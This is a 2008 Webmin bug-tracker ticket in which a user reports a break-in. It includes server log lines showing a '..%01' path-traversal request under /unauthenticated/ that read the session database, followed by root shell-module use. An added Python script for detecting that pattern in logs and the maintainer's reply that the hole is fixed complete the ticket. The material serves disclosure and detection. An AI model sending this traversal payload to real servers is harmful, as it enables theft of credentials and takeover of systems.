#3020 Webmin cracked through GET /unauthenticated/

Milestone: 1.370
Status: closed-fixed
Owner: nobody
Labels: None
Priority: 5
Updated: 2008-01-15
Created: 2008-01-15
Creator: biland
Private: No

I don't know if this is really a bug but I will report it.
I had webmin 1.370 with default install on Fedora Core (installed with yum).
I found this in file: /var/webmin/miniserv.log:

59.106.21.107 - - [12/Jan/2008:23:05:15 -0500] "GET /unauthenticated//..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/var/webmin/sessiondb.pag HTTP/1.1" 200 1024
59.106.21.107 - - [12/Jan/2008:23:05:16 -0500] "GET /unauthenticated//..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/var/log/sessiondb.pag HTTP/1.1" 404 32
59.106.21.107 - root [12/Jan/2008:23:05:58 -0500] "POST /shell/index.cgi HTTP/1.1" 200 12059
59.106.21.107 - root [12/Jan/2008:23:06:00 -0500] "POST /shell/index.cgi HTTP/1.1" 200 12059
61.7.231.67 - root [12/Jan/2008:23:31:54 -0500] "POST /shell/index.cgi HTTP/1.1" 200 12059

It seems that through this special request the attacker grabbed the file /var/webmin/sessiondb.pag and figured out the root password from there.
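The log excerpt above is the kind of evidence a defender can hunt for mechanically: percent-decode each request path, count the `..` segments (after stripping control bytes such as the `%01` glued to each one), and then watch for authenticated activity from an IP that previously pulled a file through `/unauthenticated/`. The following script is an added example, not code from the report or from Webmin; the sample log lines are constructed to mirror the excerpt (documentation IP ranges, shortened traversal sequences), and the finding names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample modelled on the miniserv.log excerpt in the report
# (documentation IP ranges, shortened traversal sequences).
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jan/2008:23:05:15 -0500] "GET /unauthenticated//..%01/..%01/..%01/..%01/var/webmin/sessiondb.pag HTTP/1.1" 200 1024
203.0.113.5 - - [12/Jan/2008:23:05:16 -0500] "GET /unauthenticated//..%01/..%01/..%01/..%01/var/log/sessiondb.pag HTTP/1.1" 404 32
203.0.113.5 - root [12/Jan/2008:23:05:58 -0500] "POST /shell/index.cgi HTTP/1.1" 200 12059
198.51.100.7 - root [12/Jan/2008:23:31:54 -0500] "POST /shell/index.cgi HTTP/1.1" 200 12059
203.0.113.5 - - [12/Jan/2008:23:40:00 -0500] "GET /unauthenticated/style.css HTTP/1.1" 200 512
"""

# Common Log Format as written by miniserv: ip ident user [timestamp] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)$'
)

CONTROL_CHARS = re.compile(r'[\x00-\x1f\x7f]')


def parse_line(line):
    """Parse one miniserv.log line into a dict of fields, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def traversal_depth(path):
    """Count '..' path segments after a single percent-decoding pass.

    Control characters glued to a segment (the '..%01' trick seen in the
    report) are stripped first, so '..\\x01' still counts as '..'.  Only one
    decoding pass is done; double-encoded input would need a second.
    """
    depth = 0
    for seg in unquote(path).split('/'):
        if CONTROL_CHARS.sub('', seg) == '..':
            depth += 1
    return depth


def analyze(log_text):
    """Return a list of findings: traversal requests under /unauthenticated/,
    and any later authenticated request from an IP whose traversal got a 200."""
    findings = []
    compromised_ips = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        depth = traversal_depth(rec['path'])
        if rec['path'].startswith('/unauthenticated/') and depth > 0:
            success = rec['status'] == '200'
            findings.append({
                'kind': 'traversal-success' if success else 'traversal-attempt',
                'ip': rec['ip'],
                'depth': depth,
                # last decoded path component: the file the request was after
                'target': unquote(rec['path']).rsplit('/', 1)[-1],
                'ts': rec['ts'],
            })
            if success:
                compromised_ips.add(rec['ip'])
        elif rec['ip'] in compromised_ips and rec['user'] != '-':
            # a login following a successful unauthenticated file read is the
            # sequence the report describes: treat the session as suspect
            findings.append({
                'kind': 'post-traversal-auth',
                'ip': rec['ip'],
                'user': rec['user'],
                'request': f"{rec['method']} {rec['path']}",
                'ts': rec['ts'],
            })
    return findings


if __name__ == '__main__':
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Run it against a real `/var/webmin/miniserv.log` by passing the file contents to `analyze()`. The `post-traversal-auth` finding is only raised for IPs that already produced a `traversal-success`, so the second `root` login from an unrelated address in the sample is not flagged on its own; correlating that one would need a separate rule (for example, any authenticated use of the shell module from an address with no prior normal login).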

Discussion

  • Jamie Cameron
    2008-01-15

    Yes, some older Webmin versions had a security hole just like this. I tested this attack against 1.390, and it doesn't work any more - in fact, I'm pretty sure that it didn't work in 1.370 either. Are you sure you weren't using an older version at some time?

    Regardless, the latest release is definitely not vulnerable to this bug.

  • Jamie Cameron
    2008-01-15

    • status: open --> closed-fixed